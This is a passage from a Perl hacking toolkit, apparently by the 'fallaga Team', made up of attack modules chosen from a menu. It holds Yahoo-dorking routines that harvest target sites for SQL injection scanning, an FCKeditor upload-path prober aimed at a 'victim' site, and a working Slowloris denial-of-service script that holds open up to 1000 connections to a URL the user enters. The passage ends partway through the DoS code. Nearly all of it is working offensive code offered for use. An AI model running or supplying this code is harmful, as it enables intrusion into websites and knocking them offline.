1970.        my $search = ("http://th.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1971.        my $res = &search_engine_query($search);
1972.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1973.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1974.            }
1975.        }
1976.    } return @list;
1977. }
1978.  
1979. sub argentina() {
1980.    my @list;
1981.  my $key = $_[0];
1982.  my $b   = 0;
1983.    for (my $i=1; $i<=200; $i+=100) {
1984.        my $search = ("http://ar.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1985.        my $res = &search_engine_query($search);
1986.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
1987.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
1988.            }
1989.        }
1990.    } return @list;
1991. }
1992.  
1993. sub singapura() {
1994.    my @list;
1995.  my $key = $_[0];
1996.  my $b   = 0;
1997.    for (my $i=1; $i<=200; $i+=100) {
1998.        my $search = ("http://sg.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
1999.        my $res = &search_engine_query($search);
2000.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2001.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2002.            }
2003.        }
2004.    } return @list;
2005. }
2006.  
2007. sub malaysia() {
2008.    my @list;
2009.  my $key = $_[0];
2010.  my $b   = 0;
2011.    for (my $i=1; $i<=200; $i+=100) {
2012.        my $search = ("http://malaysia.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2013.        my $res = &search_engine_query($search);
2014.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2015.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2016.            }
2017.        }
2018.    } return @list;
2019. }
2020.  
2021. sub vietnam() {
2022.    my @list;
2023.  my $key = $_[0];
2024.  my $b   = 0;
2025.    for (my $i=1; $i<=200; $i+=100) {
2026.        my $search = ("http://vn.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2027.        my $res = &search_engine_query($search);
2028.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2029.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2030.            }
2031.        }
2032.    } return @list;
2033. }
2034.  
2035. sub swedia() {
2036.    my @list;
2037.  my $key = $_[0];
2038.  my $b   = 0;
2039.    for (my $i=1; $i<=200; $i+=100) {
2040.        my $search = ("http://se.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2041.        my $res = &search_engine_query($search);
2042.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2043.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2044.            }
2045.        }
2046.    } return @list;
2047. }
2048.  
2049. sub rusia() {
2050.    my @list;
2051.  my $key = $_[0];
2052.  my $b   = 0;
2053.    for (my $i=1; $i<=200; $i+=100) {
2054.        my $search = ("http://ru.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2055.        my $res = &search_engine_query($search);
2056.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2057.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2058.            }
2059.        }
2060.    } return @list;
2061. }
2062.  
2063. sub czech() {
2064.    my @list;
2065.  my $key = $_[0];
2066.  my $b   = 0;
2067.    for (my $i=1; $i<=200; $i+=100) {
2068.        my $search = ("http://cs.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2069.        my $res = &search_engine_query($search);
2070.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2071.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2072.            }
2073.        }
2074.    } return @list;
2075. }
2076.  
2077. sub belanda() {
2078.    my @list;
2079.  my $key = $_[0];
2080.  my $b   = 0;
2081.    for (my $i=1; $i<=200; $i+=100) {
2082.        my $search = ("http://nl.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2083.        my $res = &search_engine_query($search);
2084.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2085.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2086.            }
2087.        }
2088.    } return @list;
2089. }
2090.  
2091. sub australia() {
2092.    my @list;
2093.  my $key = $_[0];
2094.  my $b   = 0;
2095.    for (my $i=1; $i<=200; $i+=100) {
2096.        my $search = ("http://au.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2097.        my $res = &search_engine_query($search);
2098.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2099.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2100.            }
2101.        }
2102.    } return @list;
2103. }
2104.  
2105. sub brasil() {
2106.    my @list;
2107.  my $key = $_[0];
2108.  my $b   = 0;
2109.    for (my $i=1; $i<=200; $i+=100) {
2110.        my $search = ("http://br.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2111.        my $res = &search_engine_query($search);
2112.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2113.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2114.            }
2115.        }
2116.    } return @list;
2117. }
2118.  
2119. sub canada() {
2120.    my @list;
2121.  my $key = $_[0];
2122.  my $b   = 0;
2123.    for (my $i=1; $i<=200; $i+=100) {
2124.        my $search = ("http://ca.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2125.        my $res = &search_engine_query($search);
2126.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2127.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2128.            }
2129.        }
2130.    } return @list;
2131. }
2132.  
2133. sub jerman() {
2134.    my @list;
2135.  my $key = $_[0];
2136.  my $b   = 0;
2137.    for (my $i=1; $i<=200; $i+=100) {
2138.        my $search = ("http://de.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2139.        my $res = &search_engine_query($search);
2140.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2141.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2142.            }
2143.        }
2144.    } return @list;
2145. }
2146.  
2147. sub spanyol() {
2148.    my @list;
2149.  my $key = $_[0];
2150.  my $b   = 0;
2151.    for (my $i=1; $i<=200; $i+=100) {
2152.        my $search = ("http://es.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2153.        my $res = &search_engine_query($search);
2154.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2155.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2156.            }
2157.        }
2158.    } return @list;
2159. }
2160.  
2161. sub perancis() {
2162.    my @list;
2163.  my $key = $_[0];
2164.  my $b   = 0;
2165.    for (my $i=1; $i<=200; $i+=100) {
2166.        my $search = ("http://fr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2167.        my $res = &search_engine_query($search);
2168.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2169.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2170.            }
2171.        }
2172.    }
2173. return @list;
2174. }
2175.  
2176. sub italia() {
2177.    my @list;
2178.  my $key = $_[0];
2179.  my $b   = 0;
2180.    for (my $i=1; $i<=200; $i+=100) {
2181.        my $search = ("http://it.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2182.        my $res = &search_engine_query($search);
2183.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2184.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2185.            }
2186.        }
2187.    } return @list;
2188. }
2189.  
2190. sub turki() {
2191.    my @list;
2192.  my $key = $_[0];
2193.  my $b   = 0;
2194.    for (my $i=1; $i<=200; $i+=100) {
2195.        my $search = ("http://tr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2196.        my $res = &search_engine_query($search);
2197.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2198.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2199.            }
2200.        }
2201.    } return @list;
2202. }
2203.  
2204. sub polandia() {
2205.    my @list;
2206.  my $key = $_[0];
2207.  my $b   = 0;
2208.    for (my $i=1; $i<=200; $i+=100) {
2209.        my $search = ("http://pl.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2210.        my $res = &search_engine_query($search);
2211.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2212.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2213.            }
2214.        }
2215.    } return @list;
2216. }
2217.  
2218. sub filipina() {
2219.    my @list;
2220.  my $key = $_[0];
2221.  my $b   = 0;
2222.    for (my $i=1; $i<=200; $i+=100) {
2223.        my $search = ("http://ph.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2224.        my $res = &search_engine_query($search);
2225.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2226.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2227.            }
2228.        }
2229.    } return @list;
2230. }
2231.  
2232. sub inggris() {
2233.    my @list;
2234.  my $key = $_[0];
2235.  my $b   = 0;
2236.    for (my $i=1; $i<=200; $i+=100) {
2237.        my $search = ("http://uk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2238.        my $res = &search_engine_query($search);
2239.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2240.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2241.            }
2242.        }
2243.    } return @list;
2244. }
2245.  
2246. sub peru() {
2247.    my @list;
2248.  my $key = $_[0];
2249.  my $b   = 0;
2250.    for (my $i=1; $i<=200; $i+=100) {
2251.        my $search = ("http://pe.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2252.        my $res = &search_engine_query($search);
2253.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2254.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2255.            }
2256.        }
2257.    } return @list;
2258. }
2259.  
2260. sub hongkong() {
2261.    my @list;
2262.  my $key = $_[0];
2263.  my $b   = 0;
2264.    for (my $i=1; $i<=200; $i+=100) {
2265.        my $search = ("http://hk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2266.        my $res = &search_engine_query($search);
2267.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2268.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2269.            }
2270.        }
2271.    } return @list;
2272. }
2273.  
2274. sub yunani() {
2275.    my @list;
2276.  my $key = $_[0];
2277.  my $b   = 0;
2278.    for (my $i=1; $i<=200; $i+=100) {
2279.        my $search = ("http://gr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2280.        my $res = &search_engine_query($search);
2281.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2282.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2283.            }
2284.        }
2285.    } return @list;
2286. }
2287.  
2288. sub finlandia() {
2289.    my @list;
2290.  my $key = $_[0];
2291.  my $b   = 0;
2292.    for (my $i=1; $i<=200; $i+=100) {
2293.        my $search = ("http://fi.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2294.        my $res = &search_engine_query($search);
2295.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2296.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2297.            }
2298.        }
2299.    } return @list;
2300. }
2301.  
2302. sub kolombia() {
2303.    my @list;
2304.  my $key = $_[0];
2305.  my $b   = 0;
2306.    for (my $i=1; $i<=200; $i+=100) {
2307.        my $search = ("http://co.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2308.        my $res = &search_engine_query($search);
2309.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2310.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2311.            }
2312.        }
2313.    } return @list;
2314. }
2315.  
2316. sub taiwan() {
2317.    my @list;
2318.  my $key = $_[0];
2319.  my $b   = 0;
2320.    for (my $i=1; $i<=200; $i+=100) {
2321.        my $search = ("http://tw.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2322.        my $res = &search_engine_query($search);
2323.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2324.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2325.            }
2326.        }
2327.    } return @list;
2328. }
2329.  
2330. sub swiss() {
2331.    my @list;
2332.  my $key = $_[0];
2333.  my $b   = 0;
2334.    for (my $i=1; $i<=200; $i+=100) {
2335.        my $search = ("http://ch.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2336.        my $res = &search_engine_query($search);
2337.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2338.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2339.            }
2340.        }
2341.    } return @list;
2342. }
2343.  
2344. sub mexico() {
2345.    my @list;
2346.        my $key = $_[0];
2347.        my $b     = 0;
2348.    for (my $i=1; $i<=200; $i+=100) {
2349.        my $search = ("http://mx.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2350.        my $res = &search_engine_query($search);
2351.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2352.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2353.            }
2354.        }
2355.    } return @list;
2356. }
2357. sub Uk() {
2358.    my @list;
2359.  my $key = $_[0];
2360.  my $b   = 0;
2361.    for (my $i=1; $i<=200; $i+=100) {
2362.        my $search = ("http://co.uk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2363.        my $res = &search_engine_query($search);
2364.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2365.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2366.            }
2367.        }
2368.    } return @list;
2369. }
2370. sub Israel() {
2371.    my @list;
2372.  my $key = $_[0];
2373.  my $b   = 0;
2374.    for (my $i=1; $i<=200; $i+=100) {
2375.        my $search = ("http://co.il.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2376.        my $res = &search_engine_query($search);
2377.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2378.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2379.            }
2380.        }
2381.    } return @list;
2382. }
2383. sub french() {
2384.    my @list;
2385.  my $key = $_[0];
2386.  my $b   = 0;
2387.    for (my $i=1; $i<=200; $i+=100) {
2388.        my $search = ("http://fr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2389.        my $res = &search_engine_query($search);
2390.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2391.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2392.            }
2393.        }
2394.    } return @list;
2395. }
2396. sub Tunisia() {
2397.    my @list;
2398.  my $key = $_[0];
2399.  my $b   = 0;
2400.    for (my $i=1; $i<=200; $i+=100) {
2401.        my $search = ("http://tn.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2402.        my $res = &search_engine_query($search);
2403.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2404.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2405.            }
2406.        }
2407.    } return @list;
2408. }
2409. ################################################
2410. sub search_engine_query() {
2411.        my $url = $_[0];
2412.        $url =~ s/http:\/\///;
2413.        my $host = $url;
2414.        my $query = $url;
2415.        my $page  = "";
2416.        $host =~ s/href=\"?http:\/\///;
2417.        $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
2418.        $query =~ s/$host//;
2419.        if ($query eq "") { $query = "/"; }
2420.                eval {
2421.                        my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
2422.                        my $sget = "GET $query HTTP/1.0\r\n";
2423.                        $sget .= "Host: $host\r\n";
2424.                        $sget .= "Accept: */*\r\n";
2425.                        $sget .= "User-Agent: $uagent\r\n";
2426.                        $sget .= "Connetion: Close\r\n\r\n";
2427.                        print $sock $sget;
2428.                        my @pages = <$sock>;
2429.                        $page = "@pages";
2430.                        close($sock);
2431.                };
2432.        return $page;
2433. }
2434.  
2435. sub clean() {
2436.    my @cln = ();
2437.    my %visit = ();
2438.    foreach my $element (@_) {
2439.        $element =~ s/\/+/\//g;
2440.        next if $visit{$element}++;
2441.        push @cln, $element;
2442.    }
2443.    return @cln;
2444. }
2445.  
2446. sub links() {
2447. my @l;
2448. my $link=$_[0];
2449. my $host=$_[0];
2450. my $hdir=$_[0];
2451. $hdir=~s/(.*)\/[^\/]*$/\1/;
2452. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
2453. $host.="/";
2454. $link.="/";
2455. $hdir.="/";
2456. $host=~s/\/\//\//g;
2457. $hdir=~s/\/\//\//g;
2458. $link=~s/\/\//\//g;
2459. push(@l,$link,$host,$hdir);
2460. return @l;
2461. }
2462.  
2463. sub getcontent() {
2464.    my $url = $_[0];
2465.    my $req = HTTP::Request->new(GET => $url);
2466.    my $ua  = LWP::UserAgent->new();
2467.    $ua->timeout(15);
2468.    my $response = $ua->request($req);
2469.    return $response->content;
2470. }
2471.  
2472. sub printlog {
2473. my ($logsec,$logmin,$loghour,$logmday,$logmon,$logyear,$logwday,$logyday,$logisdst)=localtime(time);
2474. my $logtimestamp = sprintf("%4d-%02d-%02d,%02d:%02d:%02d",$logyear+1900,$logmon+1,$logmday,$loghour,$logmin,$logsec);
2475. $logmon++;
2476. $logyear=$logyear+1900;
2477. my $log="[$logdir$logyear-$logmon-$logmday]SQLscan.log";
2478. open(lo,">>$log") or die "$log:$!";
2479. print lo @_[0];
2480. close(lo);
2481. return;
2482. }}
2483. }
2484. if($targett eq '11')
2485. {
2486. system('cls');
2487. system('title FckEditor Dir Tester');
2488.                    {
2489. use HTTP::Request;
2490. use LWP::UserAgent;
2491.  
2492. system('cls');
2493. system(' Title FckEditor Dir Tester');
2494. system "color a";
2495. print"\n";
2496. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
2497. print "\t>                    F4cK3 3d!t0r Dir Tester                         >\n";
2498. print "\t>                                                                  >\n";
2499. print "\t>                     Created By Fallag crx                          >\n";
2500. print "\t>          fallaga  | Team                     >\n";
2501. print "\t>                    Result In FckEditor.txt                       >\n";
2502. print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
2503. print "\n";
2504.  
2505. print " Enter The Site\n\n Example: www.victim.com \n\n-> ";
2506.  
2507.  
2508. $site=<STDIN>;
2509. chomp $site;
2510.  
2511. if($site !~ /http:\/\//) { $site = "http://$site/"; };
2512.  
2513. print "\n";
2514.  
2515. @path = ('/editor/editor/filemanager/connectors/uploadtest.html',
2516. '/editor/editor/filemanager/upload/test.html',
2517. '/editor/editor/filemanager/browser/default/connectors/test.html',
2518. '/editor/editor/filemanager/connectors/test.html',
2519. '/admin/fckeditor/editor/filemanager/connectors/test.html',
2520. '/FCKeditor/editor/filemanager/upload/test.html',
2521. '/Fckeditor/editor/filemanager/browser/default/connectors/test.html',
2522. '/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html',
2523. '/admin/FCKeditor/editor/filemanager/upload/test.html',
2524. '/Fckeditor/editor/filemanager/connectors/test.html',
2525. '/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html',
2526. '/FCKeditor/editor/filemanager/connectors/uploadtest.html',
2527. '/js/fckeditor/editor/filemanager/connectors/test.html',
2528. '/admin/FCKeditor/editor/filemanager/connectors/test.html',
2529. '/admin/FCKeditor/editor/fckeditor.html',
2530. '/include/fckeditor/_samples/default.html',
2531. '/include/fckeditor/editor/filemanager/connectors/test.html',);
2532.  
2533.  
2534. foreach $fckeditor(@path){
2535.  
2536. $url = $site.$fckeditor;
2537. $req = HTTP::Request->new(GET=>$url);
2538. $useragent = LWP::UserAgent->new();
2539.  
2540. $response = $useragent->request($req);
2541.  
2542. if ($response->is_success){
2543. print "$fckeditor\n";
2544. $url = substr($url, $fckeditor + 13);
2545. $fckeditor = substr($url, 0, index($url, '"'));
2546. open (txt,">>FckEditor.txt");
2547. print txt  $fckeditor,"\n";
2548. close(txt);
2549. print "=> Dir Found : $url\n";
2550. }
2551. else {
2552. print "=> Not Found : $fckeditor\n";
2553. }}
2554. }}
2555. if($targett eq '16')
2556. {
2557. system('cls');
2558. system('title DDOS');
2559.                    {
2560. use strict;
2561. use IO::Socket::INET;
2562. use IO::Socket::SSL;
2563. use Getopt::Long;
2564. use Config;
2565.  
2566.  
2567. $SIG{'PIPE'} = 'IGNORE';    #Ignore broken pipe errors
2568.  
2569.  
2570. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
2571. my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
2572. my $result = GetOptions(
2573.    'shost=s'   => \$shost,
2574.    'dns=s'     => \$host,
2575.    'httpready' => \$httpready,
2576.    'num=i'     => \$connections,
2577.    'cache'     => \$cache,
2578.    'port=i'    => \$port,
2579.    'https'     => \$ssl,
2580.    'tcpto=i'   => \$tcpto,
2581.    'test'      => \$test,
2582.    'timeout=i' => \$timeout,
2583.    'version'   => \$version,
2584. );
2585.  
2586. print "[+] Enter Url For DDOS: ";
2587. chomp ($host = <STDIN>);
2588.  
2589. if ($version) {
2590.    print "Version 0.7\n";
2591.    exit;
2592. }
2593.  
2594. unless ($port) {
2595.    $port = 80;
2596.    print "Defaulting to port 80.\n";
2597. }
2598.  
2599.  
2600. unless ($tcpto) {
2601.    $tcpto = 5;
2602.    print "Defaulting to a 5 second tcp connection timeout.\n";
2603. }
2604.  
2605.  
2606. unless ($test) {
2607.    unless ($timeout) {
2608.        $timeout = 100;
2609.        print "Defaulting to a 100 second re-try timeout.\n";
2610.    }
2611.    unless ($connections) {
2612.        $connections = 1000;
2613.        print "Defaulting to 1000 connections.\n";
2614.    }
2615. }
2616.  
2617.  
2618. my $usemultithreading = 0;
2619. if ( $Config{usethreads} ) {
2620.    print "Multithreading enabled.\n";
2621.    $usemultithreading = 1;
2622.    use threads;
2623.    use threads::shared;
2624. }
2625. else {
2626.    print "No multithreading capabilites found!\n";
2627.    print "Slowloris will be slower than normal as a result.\n";
2628. }
2629.  
2630.  
2631. my $packetcount : shared     = 0;
2632. my $failed : shared          = 0;
2633. my $connectioncount : shared = 0;
2634.  
2635.  
2636. srand() if ($cache);
2637.  
2638.  
2639. if ($shost) {
2640.    $sendhost = $shost;
2641. }
2642. else {
2643.    $sendhost = $host;
2644. }
2645. if ($httpready) {
2646.    $method = "POST";
2647. }
2648. else {
2649.    $method = "GET";
2650. }
2651.  
2652.  
2653. if ($test) {
2654.    my @times = ( "2", "30", "90", "240", "500" );
2655.    my $totaltime = 0;
2656.    foreach (@times) {
2657.        $totaltime = $totaltime + $_;
2658.    }
2659.    $totaltime = $totaltime / 60;
2660.    print "This test could take up to $totaltime minutes.\n";
2661.  
2662.  
2663.    my $delay   = 0;
2664.    my $working = 0;
2665.    my $sock;
2666.  
2667.  
2668.    if ($ssl) {
2669.        if (
2670.            $sock = new IO::Socket::SSL(
2671.                PeerAddr => "$host",
2672.                PeerPort => "$port",
2673.                Timeout  => "$tcpto",
2674.                Proto    => "tcp",
2675.            )
2676.          )
2677.        {
2678.            $working = 1;
2679.        }
2680.    }
2681.    else {
2682.        if (
2683.            $sock = new IO::Socket::INET(
2684.                PeerAddr => "$host",
2685.                PeerPort => "$port",
2686.                Timeout  => "$tcpto",
2687.                Proto    => "tcp",
2688.            )
2689.          )
2690.        {
2691.            $working = 1;
2692.        }
2693.    }
2694.    if ($working) {
2695.        if ($cache) {
2696.            $rand = "?" . int( rand(99999999999999) );
2697.        }
2698.        else {
2699.            $rand = "";
2700.        }
2701.        my $primarypayload =
2702.            "GET /$rand HTTP/1.1\r\n"
2703.          . "Host: $sendhost\r\n"
2704.          . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
2705.          . "Content-Length: 42\r\n";
2706.        if ( print $sock $primarypayload ) {
2707.            print "Connection successful, now comes the waiting game...\n";
2708.        }
2709.        else {
2710.            print
2711. "That's odd - I connected but couldn't send the data to $host:$port.\n";
2712.            print "Is something wrong?\nDying.\n";
2713.            exit;
2714.        }
2715.    }
2716.    else {
2717.        print "Uhm... I can't connect to $host:$port.\n";
2718.        print "Is something wrong?\nDying.\n";
2719.        exit;
2720.    }
2721.    for ( my $i = 0 ; $i <= $#times ; $i++ ) {
2722.        print "Trying a $times[$i] second delay: \n";
2723.        sleep( $times[$i] );
2724.        if ( print $sock "X-a: b\r\n" ) {
2725.            print "\tWorked.\n";
2726.            $delay = $times[$i];
2727.        }
2728.        else {
2729.            if ( $SIG{__WARN__} ) {
2730.                $delay = $times[ $i - 1 ];
2731.                last;
2732.            }
2733.            print "\tFailed after $times[$i] seconds.\n";
2734.        }
2735.    }
2736.  
2737.  
2738.    if ( print $sock "Connection: Close\r\n\r\n" ) {
2739.        print "Okay that's enough time. Slowloris closed the socket.\n";
2740.        print "Use $delay seconds for -timeout.\n";
2741.        exit;
2742.    }
2743.    else {
2744.        print "Remote server closed socket.\n";
2745.        print "Use $delay seconds for -timeout.\n";
2746.        exit;
2747.    }
2748.    if ( $delay < 166 ) {
2749.        print <<EOSUCKS2BU;
2750. Since the timeout ended up being so small ($delay seconds) and it generally
2751. takes between 200-500 threads for most servers and assuming any latency at
2752. all...  you might have trouble using Slowloris against this target.  You can
2753. tweak the -timeout flag down to less than 10 seconds but it still may not
2754. build the sockets in time.
2755. EOSUCKS2BU
2756.    }
2757. }
2758. else {
2759.    print
2760. "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
2761.  
2762.  
2763.    if ($usemultithreading) {
2764.        domultithreading($connections);
2765.    }
2766.    else {
2767.        doconnections( $connections, $usemultithreading );
2768.    }
2769. }
2770.  
2771.  
2772. sub doconnections {
2773.    my ( $num, $usemultithreading ) = @_;
2774.    my ( @first, @sock, @working );
2775.    my $failedconnections = 0;
2776.    $working[$_] = 0 foreach ( 1 .. $num );    #initializing
2777.    $first[$_]   = 0 foreach ( 1 .. $num );    #initializing
2778.    while (1) {
2779.        $failedconnections = 0;
2780.        print "\t\tBuilding sockets.\n";
2781.        foreach my $z ( 1 .. $num ) {
2782.            if ( $working[$z] == 0 ) {
2783.                if ($ssl) {
2784.                    if (
2785.                        $sock[$z] = new IO::Socket::SSL(
2786.                            PeerAddr => "$host",
2787.                            PeerPort => "$port",
2788.                            Timeout  => "$tcpto",
2789.                            Proto    => "tcp",
2790.                        )
2791.                      )
2792.                    {
2793.                        $working[$z] = 1;
2794.                    }
2795.                    else {
2796.                        $working[$z] = 0;
2797.                    }
2798.                }
2799.                else {
2800.                    if (
2801.                        $sock[$z] = new IO::Socket::INET(
2802.                            PeerAddr => "$host",
2803.                            PeerPort => "$port",
2804.                            Timeout  => "$tcpto",
2805.                            Proto    => "tcp",
2806.                        )
2807.                      )
2808.                    {
2809.                        $working[$z] = 1;
2810.                        $packetcount = $packetcount + 3;  #SYN, SYN+ACK, ACK
2811.                    }
2812.                    else {
2813.                        $working[$z] = 0;
2814.                    }
2815.                }
